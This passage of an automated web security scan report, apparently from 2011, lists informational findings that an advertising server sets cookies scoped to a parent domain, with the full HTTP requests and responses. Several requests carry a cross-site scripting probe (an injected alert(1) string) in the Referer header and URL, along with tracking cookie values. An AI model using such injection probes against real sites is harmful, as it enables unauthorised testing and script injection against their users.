GET /site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=BkRFW2EBAAAABAAAAMAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; ROLL=AfAid6Nga0dM2aDL/oJpfu+3b1ZWiJF!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:10:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894872.775634.0XMC
Set-Cookie: F1=BsRFW2EBAAAABAAAAQAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:35 GMT; path=/
Set-Cookie: BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:35 GMT; path=/
Set-Cookie: ROLL=AfAia6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7maJ!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:35 GMT; path=/
Set-Cookie: 54361916=_4d96151b,5335516523,775634^894872^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:10:35 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735209/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000775634/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BwTFW2EBAAAABAAAAoAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:08 GMT; path=/
BASE=gKQkgmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RurRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6eHnzzntzG!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:08 GMT; path=/
ROLL=AfAiU6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8RyRUR5J/vnUtq1r5N!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:08 GMT; path=/
47025873=_4d96153c,3635670272,782463^950857^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=BkTFW2EBAAAABAAAAkAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RurRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; ROLL=AfAiX6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8RyRUR5J/P!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.950857.782463.0XMC
Set-Cookie: F1=BwTFW2EBAAAABAAAAoAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:08 GMT; path=/
Set-Cookie: BASE=gKQkgmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RurRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6eHnzzntzG!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:08 GMT; path=/
Set-Cookie: ROLL=AfAiU6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8RyRUR5J/vnUtq1r5N!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:08 GMT; path=/
Set-Cookie: 47025873=_4d96153c,3635670272,782463^950857^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:11:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 571

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/00F/jview/273046185/direct;wi.160;hi.600/01?click=http://r1-ads.ace.advertising.com/click/site=000078246
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BwRFW2EBAAAABAAAAUAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:36 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:36 GMT; path=/
ROLL=AfAib6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCL!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:36 GMT; path=/
70936362=_4d96151c,7111480630,782463^956558^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=BsRFW2EBAAAABAAAAQAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; ROLL=AfAia6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7maJ!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:10:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956558.782463.0XMC
Set-Cookie: F1=BwRFW2EBAAAABAAAAUAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:36 GMT; path=/
Set-Cookie: BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:36 GMT; path=/
Set-Cookie: ROLL=AfAib6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCL!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:36 GMT; path=/
Set-Cookie: 70936362=_4d96151c,7111480630,782463^956558^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:10:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390404/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000782463/mnum=0000956
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=BYRFW2EBAAAABAAAAIAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:30 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vwLJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:30 GMT; path=/
ROLL=AfAic6Nga0dM2aDL/oJpfuO!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:30 GMT; path=/
21125090=_4d961516,2247225356,782464^894873^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=BMRFW2EBAAAABAAAAEAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJmtNJeSKvs26+zh4vwLJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; ROLL=AfAif6Nga0dM2aD!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:10:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894873.782464.0XMC
Set-Cookie: F1=BYRFW2EBAAAABAAAAIAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:30 GMT; path=/
Set-Cookie: BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vwLJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:30 GMT; path=/
Set-Cookie: ROLL=AfAic6Nga0dM2aDL/oJpfuO!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:30 GMT; path=/
Set-Cookie: 21125090=_4d961516,2247225356,782464^894873^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 01 Apr 2011 18:10:30 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735206/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000782464/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=B8SFW2EBAAAABAAAAcAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:55 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:55 GMT; path=/
ROLL=AfAiZ6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:55 GMT; path=/
83041319=_4d96152f,2174120635,782464^950887^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=B0SFW2EBAAAABAAAAYAAgEA; BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; ROLL=AfAiY6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqF!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.950887.782464.0XMC
Set-Cookie: F1=B8SFW2EBAAAABAAAAcAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:55 GMT; path=/
